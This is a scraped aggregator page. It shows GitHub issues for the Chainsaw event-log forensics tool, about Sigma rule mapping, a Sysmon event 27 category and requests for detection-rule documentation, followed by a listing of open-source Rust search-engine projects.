    I think the problem is that the category in question (file_block) is not mapped to anything - where and how can I define this? In this example, the category should be file_block iff "provider_name": "Microsoft-Windows-Sysmon" and event_id: 27, which would clearly identify the category.

    I have a similar problem for several other rules. Am I perhaps misunderstanding how certain things work?

    Any help on this would be much appreciated :)

    enhancement 
    opened by Maspital 12
  • Count column

    Count column

    The behavior of Chainsaw does not work as I thought. I assumed the output column 'count' represents the number of occurrences of that specific event, but based on my EVTX files, that does not appear correct. So what does the 'column' mean?

    Clipboard04

    question 
    opened by mkwired 1
  • Documentation or guidance on expanding Chainsaw's functionality

    Documentation or guidance on expanding Chainsaw's functionality

    Hello,

    Would it be possible for some documentation or guidance on how to expand the functionality of Chainsaw using sigma rules and chainsaw's mapping file?

    I've spoken with a number of people in the DFIR community who would love to be able to contribute and build on what is already an amazing tool but have struggled to understand how to write new rules and then map it to Chainsaw's output (myself included!)

    I'd be more than happy to collate some ideas for detection rules if that would help the process in anyway.

    Any help, support or resource you can offer would be greatly appreciated.

    Many thanks

    Tom

    documentation 
    opened by tomnewman86 15
Releases(v2.3.0)
Owner
F-Secure Countercept
F-Secure Countercept
Shogun search - Learning the principle of search engine. This is the first time I've written Rust.

shogun_search Learning the principle of search engine. This is the first time I've written Rust. A search engine written in Rust. Current Features: Bu

Yuxiang Liu 5 Mar 9, 2022
weggli is a fast and robust semantic search tool for C and C++ codebases. It is designed to help security researchers identify interesting functionality in large codebases.

weggli Introduction weggli is a fast and robust semantic search tool for C and C++ codebases. It is designed to help security researchers identify int

Google Project Zero 2k Jan 5, 2023
A simple and lightweight fuzzy search engine that works in memory, searching for similar strings (a pun here).

simsearch A simple and lightweight fuzzy search engine that works in memory, searching for similar strings (a pun here). Documentation Usage Add the f

Andy Lok 116 Dec 10, 2022
Lightning Fast, Ultra Relevant, and Typo-Tolerant Search Engine

MeiliSearch Website | Roadmap | Blog | LinkedIn | Twitter | Documentation | FAQ ⚡ Lightning Fast, Ultra Relevant, and Typo-Tolerant Search Engine ?? M

MeiliSearch 31.6k Dec 31, 2022
Perlin: An Efficient and Ergonomic Document Search-Engine

Table of Contents 1. Perlin Perlin Perlin is a free and open-source document search engine library build on top of perlin-core. Since the first releas

CurrySoftware GmbH 70 Dec 9, 2022
Tantivy is a full-text search engine library inspired by Apache Lucene and written in Rust

Tantivy is a full text search engine library written in Rust. It is closer to Apache Lucene than to Elasticsearch or Apache Solr in the sense it is no

tantivy 7.4k Dec 28, 2022
A full-text search and indexing server written in Rust.

Bayard Bayard is a full-text search and indexing server written in Rust built on top of Tantivy that implements Raft Consensus Algorithm and gRPC. Ach

Bayard Search 1.8k Dec 26, 2022
🔎 A simple in-memory search for collections and key-value stores.

Indicium Search ?? A simple in-memory search for collections (Vec, HashMap, BTreeMap, etc) and key-value stores. Features autocompletion. There are ma

Dylan Bowker 41 Oct 28, 2022
Tantivy is a full-text search engine library inspired by Apache Lucene and written in Rust

Tantivy is a full-text search engine library written in Rust. It is closer to Apache Lucene than to Elasticsearch or Apache Solr in the sense it is no

Quickwit OSS 7.5k Jan 9, 2023
Configurable quick search engine shortcuts for your terminal and browser.

Quicksearch Configurable quick search engine shortcuts for your terminal and browser. Installation Run cargo install quicksearch to install Configurat

Rahul Pai 2 Oct 14, 2022
High-performance log search engine.

NOTE: This project is under development, please do not depend on it yet as things may break. MinSQL MinSQL is a log search engine designed with simpli

High Performance, Kubernetes Native Object Storage 359 Nov 27, 2022
AI-powered search engine for Rust

txtai: AI-powered search engine for Rust txtai executes machine-learning workflows to transform data and build AI-powered text indices to perform simi

NeuML 69 Jan 2, 2023
A full-text search engine in rust

Toshi A Full-Text Search Engine in Rust Please note that this is far from production ready, also Toshi is still under active development, I'm just slo

Toshi Search 3.8k Jan 7, 2023
🔍TinySearch is a lightweight, fast, full-text search engine. It is designed for static websites.

tinysearch TinySearch is a lightweight, fast, full-text search engine. It is designed for static websites. TinySearch is written in Rust, and then com

null 2.2k Dec 31, 2022
🔎 Impossibly fast web search, made for static sites.

Stork Impossibly fast web search, made for static sites. Stork is two things. First, it's an indexer: it indexes your loosely-structured content and c

James Little 2.5k Dec 27, 2022
🦔 Fast, lightweight & schema-less search backend. An alternative to Elasticsearch that runs on a few MBs of RAM.

?? Fast, lightweight & schema-less search backend. An alternative to Elasticsearch that runs on a few MBs of RAM.

Valerian Saliou 17.4k Jan 2, 2023
⚡ Insanely fast, 🌟 Feature-rich searching. lnx is the adaptable deployment of the tantivy search engine you never knew you wanted. Standing on the shoulders of giants.

✨ Feature Rich | ⚡ Insanely Fast An ultra-fast, adaptable deployment of the tantivy search engine via REST. ?? Standing On The Shoulders of Giants lnx

lnx 679 Jan 1, 2023
⚡ Insanely fast, 🌟 Feature-rich searching. lnx is the adaptable deployment of the tantivy search engine you never knew you wanted. Standing on the shoulders of giants.

✨ Feature Rich | ⚡ Insanely Fast An ultra-fast, adaptable deployment of the tantivy search engine via REST. ?? Standing On The Shoulders of Giants lnx

lnx 0 Apr 25, 2022
Cross-platform, cross-browser, cross-search-engine duckduckgo-like bangs

localbang Cross-platform, cross-browser, cross-search-engine duckduckgo-like bangs What are "bangs"?? Bangs are a way to define where to search inside

Jakob Kruse 7 Nov 23, 2022